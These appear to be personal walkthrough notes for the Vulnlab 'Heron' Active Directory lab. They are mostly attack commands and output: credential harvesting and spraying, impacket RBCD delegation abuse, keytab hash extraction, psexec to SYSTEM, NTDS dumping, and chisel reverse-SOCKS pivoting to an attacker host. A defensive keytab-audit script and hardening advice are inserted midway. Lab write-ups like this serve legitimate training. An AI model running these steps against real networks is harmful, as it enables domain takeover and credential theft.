PS C:\> type flag.txt
type flag.txt
VL{REDIRECTED}
USER FLAG: VL{REDIRECTED}
PRIV ESC:
svc-web-accounting from mucdc -> root of frajmp:
Check for credentials in the C:\Windows\Scripts folder.
PS C:\Windows\Scripts> dir
dir
Directory: C:\Windows\Scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/6/2024 7:12 AM 1416 dns.ps1
-a---- 6/1/2024 8:26 AM 221 ssh.ps1 - Very interesting file.
PS C:\Windows\Scripts> type ssh.ps1
type ssh.ps1
$plinkPath = "C:\Program Files\PuTTY\plink.exe"
$targetMachine = "frajmp"
$user = "_local"
$password = "Deplete5DenialDealt"
& "$plinkPath" -ssh -batch $user@$targetMachine -pw $password "ps auxf; ls -lah /home; exit"
Found the _local credential for frajmp!
_local:Deplete5DenialDealt
ROOT from frajmp -> julian.pratt:
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# cat users.txt
svc-web-accounting-d
svc-web-accounting
wayne.wood
julian.pratt
samuel.davies
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# cat pass.txt
l6fkiy9oN
H3r0n2024#!
Deplete5DenialDealt
crackmapexec smb 10.10.165.181 -u users.txt -p pass.txt --continue-on-success | grep [+]
SMB 10.10.165.181 445 MUCDC [+] heron.vl\svc-web-accounting-d:H3r0n2024#!
SMB 10.10.165.181 445 MUCDC [+] heron.vl\julian.pratt:Deplete5DenialDealt #FOUND IT !
SMB 10.10.165.181 445 MUCDC [+] heron.vl\samuel.davies:l6fkiy9oN
Perform credential spraying (known passwords against all known users) as a last resort. #HERON from VL.
julian.pratt:Deplete5DenialDealt
julian.pratt -> adm_prju:
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# crackmapexec smb 10.10.165.181 -u julian.pratt -p 'Deplete5DenialDealt' --shares
SMB 10.10.165.181 445 MUCDC [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB 10.10.165.181 445 MUCDC [+] heron.vl\julian.pratt:Deplete5DenialDealt
SMB 10.10.165.181 445 MUCDC [+] Enumerated shares
SMB 10.10.165.181 445 MUCDC Share Permissions Remark
SMB 10.10.165.181 445 MUCDC ----- ----------- ------
SMB 10.10.165.181 445 MUCDC accounting$
SMB 10.10.165.181 445 MUCDC ADMIN$ Remote Admin
SMB 10.10.165.181 445 MUCDC C$ Default share
SMB 10.10.165.181 445 MUCDC CertEnroll READ Active Directory Certificate Services share
SMB 10.10.165.181 445 MUCDC home$ READ #Looks like julian can read her own directory in the home$ share.
SMB 10.10.165.181 445 MUCDC IPC$ Remote IPC
SMB 10.10.165.181 445 MUCDC it$
SMB 10.10.165.181 445 MUCDC NETLOGON READ Logon server share
SMB 10.10.165.181 445 MUCDC SYSVOL READ Logon server share
SMB 10.10.165.181 445 MUCDC transfer$ READ,WRITE
smbclient \\\\10.10.165.181\\home$ -U "julian.pratt%Deplete5DenialDealt"
[SNIP]
Julian.Pratt D 0 Sun Jun 2 06:47:14 2024
[SNIP]
6261499 blocks of size 4096. 1961809 blocks available
smb: \> cd Julian.Pratt
smb: \Julian.Pratt\> dir
. D 0 Sun Jun 2 06:47:14 2024
.. D 0 Sat Jun 1 11:10:46 2024
frajmp.lnk A 1443 Sun Jun 2 06:47:47 2024
Is there a way to -auto login- in PuTTY with a password- - Super User.url A 117 Sat Jun 1 11:44:44 2024
Microsoft Edge.lnk A 2312 Sat Jun 1 11:44:38 2024
mucjmp.lnk A 1441 Sun Jun 2 06:47:33 2024 #Interesting file.
mucjmp.lnk:
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# cat mucjmp.lnk
[SNIP]
adm_prju@mucjmp -pw ayDMWV929N9wAiB4
[SNIP]
crackmapexec smb 10.10.165.181 -u adm_prju -p 'ayDMWV929N9wAiB4'
SMB 10.10.165.181 445 MUCDC [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB 10.10.165.181 445 MUCDC [+] heron.vl\adm_prju:ayDMWV929N9wAiB4
bloodhound-python -c All -u adm_prju -p 'ayDMWV929N9wAiB4' -d heron.vl --dns-tcp -ns 10.10.165.181
BloodHound DATA:
RBCD Attack:
ADM_PRJU@heron.vl -> member of ADMINS_T1@heron.vl group -> WriteAccountRestrictions -> MUCDC.HERON.VL: #Linux
First Option:
https://medium.com/@offsecdeer/a-practical-guide-to-rbcd-exploitation-a3f1a47267d5
impacket-addcomputer -computer-name 'rbcd-test$' -computer-pass 'Megaman!1' -dc-ip 10.10.165.181 heron.vl/adm_prju:'ayDMWV929N9wAiB4'
impacket-rbcd -delegate-to 'mucdc$' -delegate-from 'rbcd-test$' -dc-ip 10.10.165.181 -action write heron.vl/adm_prju:'ayDMWV929N9wAiB4'
impacket-getST -spn cifs/mucdc.heron.vl -impersonate Administrator -dc-ip 10.10.165.181 heron.vl/rbcd-test:'Megaman!1'
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass heron.vl/administrator@mucdc.heron.vl
#Didn't work on HERON.VL because this account cannot add a computer object.
However, it works with the user account itself, which in this case is adm_prju (see the second option).
Second Option:
https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd#rbcd-on-spn-less-users
getTGT.py -hashes :$(pypykatz crypto nt 'ayDMWV929N9wAiB4') 'heron.vl'/'adm_prju'
describeTicket.py 'adm_prju.ccache' | grep 'Ticket Session Key'
smbpasswd.py -newhashes :4d2380ee7f799e8c84f91a9bcd7156a7 'heron.vl'/'adm_prju':'ayDMWV929N9wAiB4'@'heron.vl'
export KRB5CCNAME='adm_prju.ccache'
impacket-getST -u2u -impersonate "_admin" -spn "cifs/mucdc.heron.vl" -k -no-pass 'heron.vl'/'adm_prju'
export KRB5CCNAME='_admin@cifs_mucdc.heron.vl@HERON.VL.ccache'
crackmapexec smb 10.10.165.181 --use-kcache --ntds
#This does not work with an old version of Impacket.
Third option: #WORKS FOR HERON.VL !
from frajmp -> mucdc:
https://ethicxz.github.io/VL-Heron-Chain/#other-way-to-privesc-rbcd-with-a-machine
https://github.com/sosdave/KeyTabExtract
keytabextract.py #Only works with root on a Linux machine that is joined to the AD domain. #Useful for AD attacks such as RBCD from a Linux host to the DC (HERON.VL).
python3 keytabextract.py /etc/krb5.keytab
root@frajmp:/tmp# python3 keytabextract.py /etc/krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : HERON.VL
SERVICE PRINCIPAL : FRAJMP$/
NTLM HASH : 6f55b3b443ef192c804b2ae98e8254f7
AES-256 HASH : 7be44e62e24ba5f4a5024c185ade0cd3056b600bb9c69f11da3050dd586130e7
AES-128 HASH : dcaaea0cdc4475eee9bf78e6a6cbd0cd
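Added example, not from these notes or KeyTabExtract: a parser for the keytab format that /etc/krb5.keytab uses, reporting which enctypes the host keeps and flagging RC4 (whose key is the NT hash keytabextract printed above) without exposing any key bytes. The keytab is built in code for FRAJMP$ with made-up key material; the struct layout is the MIT one.

```python
"""Parse an MIT krb5 keytab (/etc/krb5.keytab format) and audit its key types.

Added example, independent of KeyTabExtract. Record layout: int32 size, uint16
component count, counted realm and components, uint32 name type, uint32 timestamp,
uint8 kvno, uint16 enctype, counted key, optional uint32 kvno. Keys are kept only
as lengths; RC4-HMAC (etype 23) is flagged because that key equals the NT hash.
"""
import struct

RC4_HMAC, AES128, AES256 = 23, 17, 18
ENCTYPE_NAMES = {RC4_HMAC: "rc4-hmac", AES128: "aes128-cts-hmac-sha1-96",
                 AES256: "aes256-cts-hmac-sha1-96"}
KRB5_NT_PRINCIPAL = 1
KEYTAB_MAGIC = b"\x05\x02"          # keytab file format version 0x0502


def _counted(data):
    """counted_octet_string: uint16 length followed by the bytes."""
    return struct.pack(">H", len(data)) + data


def build_keytab(realm, components, keys, kvno=2, timestamp=1717600000):
    """Encode one keytab entry per (enctype, key_bytes) for a single principal."""
    out = bytearray(KEYTAB_MAGIC)
    for enctype, key in keys:
        body = struct.pack(">H", len(components)) + _counted(realm.encode())
        body += b"".join(_counted(c.encode()) for c in components)
        body += struct.pack(">IIB", KRB5_NT_PRINCIPAL, timestamp, kvno & 0xFF)
        body += struct.pack(">H", enctype) + _counted(key)
        body += struct.pack(">I", kvno)          # 32-bit kvno extension
        out += struct.pack(">i", len(body)) + body
    return bytes(out)


class _Reader:
    """Sequential big-endian reader over one keytab record."""
    def __init__(self, buf):
        self.buf, self.off = buf, 0

    def take(self, fmt):
        vals = struct.unpack_from(fmt, self.buf, self.off)
        self.off += struct.calcsize(fmt)
        return vals[0] if len(vals) == 1 else vals

    def counted(self):
        n = self.take(">H")
        data, self.off = self.buf[self.off:self.off + n], self.off + n
        return data


def parse_keytab(data):
    """Decode every live entry; deleted slots (negative size) are skipped."""
    if data[:2] != KEYTAB_MAGIC:
        raise ValueError("only keytab version 0x0502 is supported")
    pos, entries = 2, []
    while pos + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, pos)
        pos += 4
        if size < 0:                             # deleted slot of |size| bytes
            pos -= size
            continue
        rd, pos = _Reader(data[pos:pos + size]), pos + size
        ncomp = rd.take(">H")
        realm = rd.counted().decode()
        comps = [rd.counted().decode() for _ in range(ncomp)]
        name_type, timestamp, vno8 = rd.take(">IIB")
        enctype = rd.take(">H")
        key_len = len(rd.counted())              # key bytes deliberately dropped
        vno32 = rd.take(">I") if len(rd.buf) - rd.off >= 4 else 0
        entries.append({"principal": "/".join(comps) + "@" + realm, "name_type": name_type,
                        "timestamp": timestamp, "kvno": vno32 or vno8,  # 32-bit wins if set
                        "enctype": enctype, "key_len": key_len,
                        "enctype_name": ENCTYPE_NAMES.get(enctype, f"etype-{enctype}")})
    return entries


def audit_keytab(data):
    """Per principal: enctypes present and whether an RC4 (NT-hash) key is kept."""
    summary = {}
    for e in parse_keytab(data):
        s = summary.setdefault(e["principal"],
                               {"kvno": e["kvno"], "enctypes": [], "has_rc4": False})
        s["enctypes"].append(e["enctype_name"])
        s["has_rc4"] = s["has_rc4"] or e["enctype"] == RC4_HMAC
    return summary


# Constructed sample: FRAJMP$ host keys with the three enctypes keytabextract
# reported above; the key bytes are placeholders, not real material.
SAMPLE_KEYTAB = build_keytab("HERON.VL", ["FRAJMP$"], [
    (RC4_HMAC, bytes(range(16))), (AES256, bytes(range(32))), (AES128, bytes(range(16, 32)))])

if __name__ == "__main__":
    for principal, s in audit_keytab(SAMPLE_KEYTAB).items():
        note = "  <- RC4 key present (= NT hash); drop etype 23" if s["has_rc4"] else ""
        print(f"{principal} kvno={s['kvno']} {', '.join(s['enctypes'])}{note}")
```

Two defensive takeaways follow from the audit: keep /etc/krb5.keytab root-only (root on frajmp is what made the third option work), and remove RC4 from the machine account's supported enctypes so the keytab no longer holds a directly reusable NT hash.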
rbcd.py -delegate-from 'frajmp$' -delegate-to 'mucdc$' -dc-ip 10.10.175.5 -action 'write' 'heron.vl/adm_prju:ayDMWV929N9wAiB4'
rbcd.py -delegate-to 'mucdc$' -dc-ip 10.10.175.5 -action 'read' 'heron.vl/adm_prju:ayDMWV929N9wAiB4'
impacket-getST -dc-ip 10.10.175.5 -spn cifs/mucdc.heron.vl 'heron.vl/frajmp$' -impersonate _admin -hashes :6f55b3b443ef192c804b2ae98e8254f7
export KRB5CCNAME=_admin.ccache
crackmapexec smb 10.10.175.5 --use-kcache --ntds
impacket-psexec -k -no-pass heron.vl/_admin@mucdc.heron.vl
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on mucdc.heron.vl.....
[*] Found writable share accounting$
[*] Uploading file pIsSfeMR.exe
[*] Opening SVCManager on mucdc.heron.vl.....
[*] Creating service XxdS on mucdc.heron.vl.....
[*] Starting service XxdS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2461]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
mucdc
SYSTEM-SHELL !
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 5AA1-68C9
Directory of C:\Users\Administrator\Desktop
06/06/2024 07:24 AM <DIR> .
06/06/2024 07:30 AM <DIR> ..
05/26/2024 03:16 AM 2,308 Microsoft Edge.lnk
05/26/2024 04:30 AM 1,369 plink.lnk
06/02/2024 03:45 AM 36 root.txt
3 File(s) 3,713 bytes
2 Dir(s) 4,903,018,496 bytes free
C:\Users\Administrator\Desktop> type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
464/tcp open kpasswd
593/tcp open unknown
636/tcp open ldaps
3389/tcp open ms-wbt-server
frajmp.heron.vl:10.10.255.102
Nmap scan report for 10.10.255.102
Host is up, received user-set (0.11s latency).
Scanned at 2024-10-26 12:04:10 EDT for 27s
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 10a0bd2a813d375d2375c8d283bf2a23 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIVPUPzGA2ERjiZJk6cW/S1+nDZvJbjSLwjGgTU8RETSfBV9pgYbUDrmu28cmDSCKQ0cirkaf3dggjVtJO/EvYM=
| 256 bd3229264d41d7560137bc100cde4524 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFkNc5lDxvCLp4GsbGLiAmmFudhK+TXxP978Cp6Y+z4b
https://wiki.vulnlab.com/guidance/medium/heron-chain
pentest:Heron123!
No sudo -l.
No /opt.
No gcc.
No hidden ports other than tcp/22.
pentest@frajmp:~$ netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 10.10.255.102:68 0.0.0.0:* -
pentest@frajmp:~$ ls -lah /home
total 24K
drwxr-xr-x 6 root root 4.0K Jun 6 14:18 .
drwxr-xr-x 19 root root 4.0K May 25 17:05 ..
drwxr-x--- 4 _local _local 4.0K May 26 09:31 _local
drwxr-x--- 4 pentest pentest 4.0K Jun 4 16:04 pentest
drwx------ 4 svc-web-accounting-d@heron.vl domain users@heron.vl 4.0K Jun 6 15:04 svc-web-accounting-d@heron.vl
drwx------ 3 svc-web-accounting@heron.vl domain users@heron.vl 4.0K Jun 6 15:04 svc-web-accounting@heron.vl
pentest@frajmp:~$ cat /etc/krb5.conf
[libdefaults]
udp_preference_limit = 0
default_realm = HERON.VL
dns_lookup_realm = false
dns_lookup_kdc = true
ticket_lifetime = 72h
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
fcc-mit-ticketflags = true
dns_canonicalize_hostname = false
[realms]
HERON.VL = {
kdc = mucdc.heron.vl
admin_server = mucdc.heron.vl
}
[domain_realm]
.heron.vl = HERON.VL
heron.vl = HERON.VL
#From PRIV ESC of mucdc:
_local:Deplete5DenialDealt
pentest@frajmp:/tmp$ su - _local
Password:
_local@frajmp:~$ sudo -l
[sudo] password for _local:
Matching Defaults entries for _local on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User _local may run the following commands on localhost:
(ALL : ALL) ALL
_local@frajmp:~$ sudo su
root@frajmp:/home/_local# whoami
root
root@frajmp:/home/_local# id
uid=0(root) gid=0(root) groups=0(root)
root@frajmp:/home/_local# hostname
frajmp.heron.vl
ROOT-SHELL !
root@frajmp:~# whoami
root
root@frajmp:~# id
uid=0(root) gid=0(root) groups=0(root)
root@frajmp:~# pwd
/root
root@frajmp:~# ls
flag.txt snap
root@frajmp:~# cat flag.txt
VL{5112c412c73712e84fc3d01a30298760}
ROOT FLAG: VL{5112c412c73712e84fc3d01a30298760}
./proxy -selfcert -laddr 0.0.0.0:53
./agent -connect 10.8.0.71:53 -ignore-cert &
sudo ip route add 10.10.216.0/24 dev ligolo
#Ligolo-ng will not work this time.
#Firewall prevents nmap unfortunately.
chisel SOCKS5 proxy:
./chisel server -p 9998 --reverse
./chisel.exe client --max-retry-count=1 10.10.14.126:9998 R:1080:socks
# Use it with FoxyProxy (SOCKS5) and proxychains4.conf:
socks5 127.0.0.1 1080
sshuttle -r pentest@10.10.255.102 10.10.255.0/24 - WORKS !